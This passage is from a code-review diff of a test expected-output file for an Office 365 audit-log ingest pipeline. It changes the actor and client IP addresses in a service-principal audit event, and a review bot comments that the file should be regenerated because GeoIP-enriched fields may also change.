principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -6358,9 +6358,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { 
@@ -6594,7 +6594,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -6624,9 +6624,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { 
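Review bot: The `ActorIpAddress` and `ClientIP` values in this expected-output hunk (and the parallel hunks at 6358, 6890 and 7156) are pipeline test artifacts, so a hand edit only stays correct if the raw input event was changed and the file was regenerated by the test tooling rather than by search-and-replace. These nine-line hunks show only the two IP fields; if the ingest pipeline enriches source or client addresses with GeoIP data, moving from 83.57.233.151 to 67.43.156.15 would also alter geo fields that sit outside the hunk, and those would be missed by a textual replacement. The `event.original` strings in the neighbouring hunks were updated consistently, which is good; confirming the regeneration step was used would close the remaining gap.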
@@ -6860,7 +6860,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
